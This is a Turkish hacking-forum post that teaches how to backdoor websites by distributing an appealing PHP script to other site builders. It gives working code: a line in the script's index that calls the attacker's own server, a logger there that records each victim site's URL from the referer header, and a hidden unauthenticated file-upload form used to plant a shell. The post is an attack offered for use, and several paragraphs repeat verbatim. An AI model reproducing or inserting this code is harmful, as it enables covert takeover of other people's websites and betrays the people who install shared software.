Hostiglere SIZIN [Website Backdoor]
Merhaba Arkadaşlar Ben SeLeXuS
Hacking'de senaryoların önemi çok büyük bu yüzden sizlere bugün bir Senaryo anlatıcağım
Neden Bu kadar Önemli ? Hacking'de senaryoların önemi çok büyük bu yüzden sizlere bugün bir Senaryo anlatıcağım
Düşünün bir website yazdınız veya elinizde bir script var bunula bir web site hacklemek istemezmisiniz "Nasılmı ?" diye sorduğunuzu duyar gibiyim.
İlk Önce aklımızdan bir senaryo uyduralım.
yabancı bir forum bulalım ve bu forum website kurmayı bilen bir kitle olsun
ve ellerine bir script verin ne olduğu fark etmez ama ilgi çekici ve kullanmak istiyecekleri bir script olması kitleyi artırır
sonra bu kodu sayfanın indexinde kodların arasına yerleştirin
sonra kendi websitenize bu kodu yerleştirin
bunlar ne işemi yarıyacak hemen anlatıyorum bu kodlar website Url'sini log alıp sizin web sitenizdeki "log.txt" dosyasına kayıt altına alıcak
Url ne işe yarıyacak ?
Bu Fazla Birşey Değil şimdi bu kodu ise websitenin en ücra dosyaları arasına herhangi bir isimle kaydedin
bu kod ise size Backdoor yani arka kapı sağlıyacaktır bu kod ile websiteye upload yapabilirsiniz
Shelli yükledikten sonra gerisi sizde zaten.
İlk Önce aklımızdan bir senaryo uyduralım.
yabancı bir forum bulalım ve bu forum website kurmayı bilen bir kitle olsun
ve ellerine bir script verin ne olduğu fark etmez ama ilgi çekici ve kullanmak istiyecekleri bir script olması kitleyi artırır
sonra bu kodu sayfanın indexinde kodların arasına yerleştirin
Kod:
<?php
echo '<link rel="stylesheet" type="text/css" href="http://siteniz.com/codervb.php">';
?>
Kod:
<?php
$verimiz = $_SERVER["HTTP_REFERER"];
$dosya = "loglar.txt";
$dosyam = fopen ($dosya , 'a+') or die ("Dosya a癟覺lamad覺!");
$yazi = "$verimiz\n";
fwrite($dosyam,$yazi);
fclose($dosyam);
?>
Url ne işe yarıyacak ?
Bu Fazla Birşey Değil şimdi bu kodu ise websitenin en ücra dosyaları arasına herhangi bir isimle kaydedin
Kod:
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="dosya" />
<input type="submit" value="Gönder" />
</form>
<?
if($_FILES){
$dosya = $_FILES['dosya']['tmp_name'];
copy($dosya, $_FILES['dosya']['name']);
echo 'Tamamdır';
}
?>
Shelli yükledikten sonra gerisi sizde zaten.
Son düzenleme: